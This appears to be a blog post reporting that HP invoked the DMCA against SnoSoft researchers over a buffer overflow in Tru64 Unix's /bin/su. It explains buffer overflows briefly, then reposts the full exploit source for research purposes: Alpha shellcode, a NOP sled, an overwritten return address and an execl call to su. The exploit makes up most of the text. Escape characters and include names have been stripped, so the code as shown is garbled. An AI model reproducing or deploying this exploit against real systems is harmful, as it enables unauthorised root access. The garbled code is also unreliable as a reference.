C|NET is reporting that Hewlett Packard is using the DMCA to threaten a team of researchers who disseminated information pertaining to a buffer overflow vulnerability in HP's Tru64 Unix operating system. A researcher at SnoSoft posted a link to the source code via SecurityFocus.com's Bugtraq mailing list.
In his letter to SnoSoft, Kent Ferson, Vice President of HP's UNIX Systems Unit, claims that SnoSoft is violating the DMCA as well as the Computer Fraud and Abuse Act. For research purposes, I post the source code below so that users may see what a buffer overflow is.
The source code to this exploit almost seems routine in the sense that it is the traditional buffer overflow. Buffer overflows occur when a program writes data beyond the end of a buffer. While simple buffer overflows will cause a segmentation fault, experienced programs can saturate the buffer enough to overwrite the program's instruction pointer, a pointer that tells the program what to do next. How does this program tell override the pointer and tell the computer what to do next? It injects program code into the buffer by way of the shellcode[] array. The implementation is below.
/*
/bin/su tru64 5.1
works with non-exec stack enabled
stripey is the man
developed at http://www.snosoft.com in the cerebrum labs
phased
phased at mail.ru
*/
#include
#include
#include
#include
char shellcode[]=
"x30x15xd9x43" /* subq $30,200,$16 */
"x11x74xf0x47" /* bis $31,0x83,$17 */
"x12x14x02x42" /* addq $16,16,$18 */
"xfcxffx32xb2" /* stl $17,-4($18) */
"x12x94x09x42" /* addq $16,76,$18 */
"xfcxffx32xb2" /* stl $17,-4($18) */
"xffx47x3fx26" /* ldah $17,0x47ff($31) */
"x1fx04x31x22" /* lda $17,0x041f($17) */
"xfcxffx30xb2" /* stl $17,-4($16) */
"xf7xffx1fxd2" /* bsr $16,-32 */
"x10x04xffx47" /* clr $16 */
"x11x14xe3x43" /* addq $31,24,$17 */
"x20x35x20x42" /* subq $17,1,$0 */
"xffxffxffxff" /* callsys ( disguised ) */
"x30x15xd9x43" /* subq $30,200,$16 */
"x31x15xd8x43" /* subq $30,192,$17 */
"x12x04xffx47" /* clr $18 */
"x40xffx1exb6" /* stq $16,-192($30) */
"x48xffxfexb7" /* stq $31,-184($30) */
"x98xffx7fx26" /* ldah $19,0xff98($31) */
"xd0x8cx73x22" /* lda $19,0x8cd0($19) */
"x13x05xf3x47" /* ornot $31,$19,$19 */
"x3cxffx7exb2" /* stl $19,-196($30) */
"x69x6ex7fx26" /* ldah $19,0x6e69($31) */
"x2fx62x73x22" /* lda $19,0x622f($19) */
"x38xffx7exb2" /* stl $19,-200($30) */
"x13x94xe7x43" /* addq $31,60,$19 */
"x20x35x60x42" /* subq $19,1,$0 */
"xffxffxffxff"; /* callsys ( disguised ) */
/* shellcode by Taeho Oh */
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "x1fx04xffx47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
/* 0x140010401 */
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased
");
printf("payload %db
", strlen(payload));
printf("buffer %db
", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}